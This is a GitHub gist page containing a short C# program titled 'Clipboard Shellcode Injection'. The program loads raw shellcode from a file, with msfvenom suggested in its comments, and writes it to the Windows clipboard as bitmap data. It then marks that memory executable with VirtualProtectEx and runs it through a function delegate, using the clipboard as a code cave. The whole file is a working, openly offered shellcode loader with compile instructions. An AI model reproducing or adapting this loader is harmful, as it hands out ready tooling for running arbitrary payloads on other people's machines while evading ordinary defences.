Created
August 14, 2022 04:55
-
-
Save hxlxmjxbbxs/aa5a937661ab89828b2ad4a503438042 to your computer and use it in GitHub Desktop.
Clipboard Shellcode Injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Using the clipboard as your code cave. | |
// Generate your shellcode with msfvenom or whatever | |
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin> | |
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace ClippySCInject | |
{ | |
class Program | |
{ | |
private delegate IntPtr test(); | |
static void Main(string[] args) | |
{ | |
byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin"); | |
OpenClipboard(IntPtr.Zero); | |
// SetClipBoardData() formats that work: | |
// CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9 | |
// https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats | |
IntPtr scData = SetClipboardData(0x2, payload); //CF_BITMAP = 0x2 | |
CloseClipboard(); | |
uint oldProtect = 0; //Old protect is RW by default | |
if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) | |
{ | |
test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test)); | |
executesc(); | |
} | |
} | |
[DllImport("User32.dll", EntryPoint = "OpenClipboard", SetLastError = true)] | |
private static extern bool OpenClipboard(IntPtr hWndNewOwner); | |
[DllImport("User32.dll", SetLastError = true)] | |
static extern IntPtr SetClipboardData(uint uFormat, byte[] hMem); | |
[DllImport("user32.dll", SetLastError = true)] | |
static extern bool CloseClipboard(); | |
[DllImport("kernel32.dll")] | |
static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
[DllImport("kernel32.dll", SetLastError = true)] | |
public static extern IntPtr GetCurrentProcess(); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment